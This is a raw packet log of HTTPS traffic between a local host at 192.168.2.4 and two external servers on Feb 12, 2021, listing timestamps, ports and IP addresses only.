Feb 12, 2021 01:47:07.861716986 CET	443	49734	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.861741066 CET	443	49738	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.861763954 CET	49736	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.861771107 CET	443	49739	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.861790895 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.861818075 CET	49735	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.861828089 CET	49734	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.861845016 CET	49738	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.861860991 CET	49739	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.862608910 CET	49735	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.862662077 CET	49739	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.863384962 CET	49738	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.863413095 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.864599943 CET	443	49732	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:07.864698887 CET	49732	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.865159988 CET	49732	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.867635012 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:07.867738962 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.868602991 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.879539967 CET	49736	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.883949041 CET	49734	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.906148911 CET	443	49739	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.906196117 CET	443	49735	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.906614065 CET	443	49738	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.906738043 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.906867981 CET	443	49739	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.906912088 CET	443	49739	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.906945944 CET	443	49739	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.906945944 CET	49739	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.906989098 CET	49739	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.906994104 CET	49739	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.907035112 CET	443	49735	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.907073021 CET	443	49735	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.907090902 CET	49735	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.907108068 CET	443	49735	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.907125950 CET	49735	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.907149076 CET	49735	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.907598972 CET	443	49738	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.907649994 CET	443	49738	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.907691956 CET	49738	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.907733917 CET	49738	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.907742023 CET	443	49738	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.907798052 CET	49738	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.907816887 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.907855988 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.907883883 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.907888889 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.907915115 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.908075094 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.918080091 CET	443	49732	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:07.918135881 CET	443	49732	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:07.918178082 CET	443	49732	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:07.918226004 CET	443	49732	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:07.918234110 CET	49732	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.918282032 CET	49732	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.918288946 CET	49732	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.918333054 CET	443	49732	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:07.918395042 CET	49732	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.918412924 CET	443	49732	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:07.918467045 CET	49732	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.921773911 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.922992945 CET	443	49736	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.923934937 CET	443	49736	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.923978090 CET	443	49736	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.924014091 CET	443	49736	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.924041986 CET	49736	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.924084902 CET	49736	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.924135923 CET	49736	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.924452066 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:07.924804926 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:07.924844027 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:07.924874067 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.924884081 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:07.924912930 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:07.924926996 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.924933910 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.924952030 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:07.924972057 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.925009012 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.927469015 CET	443	49734	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.928452015 CET	443	49734	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.928502083 CET	443	49734	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.928527117 CET	49734	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.928540945 CET	443	49734	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.928555012 CET	49734	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.928595066 CET	49734	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.934103012 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.934494019 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.934696913 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.934811115 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.934911966 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.935076952 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.935184956 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.935312033 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.942820072 CET	49736	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.943979025 CET	49735	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.944322109 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.944566965 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.944674969 CET	49736	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.944789886 CET	49735	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.945080996 CET	49738	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.945460081 CET	49738	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.945730925 CET	49732	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.945823908 CET	49739	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.946340084 CET	49732	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.946460009 CET	49739	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.948815107 CET	49734	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.949131012 CET	49734	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.965245008 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.965322971 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.977897882 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.977971077 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.978060007 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.978415012 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.978458881 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.978488922 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.978498936 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.978504896 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.978539944 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.978555918 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.978579998 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.978594065 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.978620052 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.978630066 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.978662968 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.978672028 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.978701115 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.978724003 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.978763103 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.979707003 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.979749918 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.979767084 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.979799986 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.979808092 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.979844093 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.979851961 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.979902983 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.980825901 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.980875969 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.980884075 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.980928898 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.981956959 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.981998920 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.982014894 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.982047081 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.983088017 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.983129025 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.983150005 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.983200073 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.983881950 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.984224081 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.984265089 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.984292030 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.984317064 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.985368967 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.985438108 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.985443115 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.985491037 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.986273050 CET	443	49736	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.986361027 CET	49736	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.986476898 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.986516953 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.986541033 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.986565113 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.987648964 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.987693071 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.987729073 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.987761021 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.988385916 CET	443	49736	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.988414049 CET	443	49735	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.988456011 CET	49736	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.988576889 CET	443	49735	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.988605976 CET	443	49735	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.988655090 CET	49735	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.988687992 CET	49735	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.988745928 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.988786936 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.988810062 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.988825083 CET	443	49738	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.988833904 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.988903046 CET	49738	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.988908052 CET	443	49738	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.988962889 CET	49738	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.989372969 CET	443	49739	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.989445925 CET	49739	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.989768028 CET	443	49739	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.989831924 CET	49739	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.989955902 CET	49738	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.990052938 CET	49735	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.990104914 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:07.990137100 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:07.990170956 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.990187883 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.992046118 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.992464066 CET	443	49734	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.992542028 CET	443	49734	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.992559910 CET	49734	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.992588997 CET	49734	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.993192911 CET	49734	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.998842001 CET	443	49732	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:07.998869896 CET	443	49732	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:07.998946905 CET	49732	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.999331951 CET	443	49732	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:07.999381065 CET	49732	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.999428034 CET	49732	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.999602079 CET	49736	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.000247955 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.000330925 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.002530098 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.002573967 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.002618074 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.002624035 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.002645969 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.002662897 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.002667904 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.002703905 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.002718925 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.002752066 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.002758026 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.002796888 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.002803087 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.002845049 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.004053116 CET	49739	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.008773088 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.008837938 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.008939981 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.008975029 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.017712116 CET	49732	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.021485090 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.021545887 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.021574974 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.021604061 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.021929979 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.021974087 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.022010088 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.022022963 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.022037983 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.022067070 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.022083998 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.022106886 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.022121906 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.022146940 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.022155046 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.022187948 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.022198915 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.022227049 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.022234917 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.022275925 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.023207903 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.023250103 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.023271084 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.023303986 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.024405003 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.024447918 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.024466991 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.024501085 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.025475025 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.025516987 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.025552988 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.025578022 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.026613951 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.026658058 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.026694059 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.026721001 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.027769089 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.027810097 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.027848959 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.027875900 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.028887987 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.028934956 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.028959036 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.028990984 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.030003071 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.030086994 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.030112982 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.030172110 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.031171083 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.031209946 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.031246901 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.031249046 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.031264067 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.031287909 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.031311035 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.031354904 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.032304049 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.032352924 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.032392025 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.032428026 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.033444881 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.033484936 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.033508062 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.033535957 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.034674883 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.034719944 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.034749985 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.034779072 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.035680056 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.035720110 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.035779953 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.035832882 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.036843061 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.036885023 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.036916971 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.036952019 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.037924051 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.037965059 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.037986994 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.038017988 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.039067030 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.039108038 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.039138079 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.039164066 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.040200949 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.040242910 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.040272951 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.040304899 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.041332006 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.041374922 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.041404963 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.041423082 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.042484045 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.042526007 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.042563915 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.042617083 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.043598890 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.043641090 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.043658018 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.043706894 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.046219110 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.046260118 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.046299934 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.046314955 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.046350956 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.046360016 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.046425104 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:47:08.046475887 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:08.052277088 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.052319050 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:08.052361012 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:08.052388906 CET	49737	443	192.168.2.4	151.101.1.44
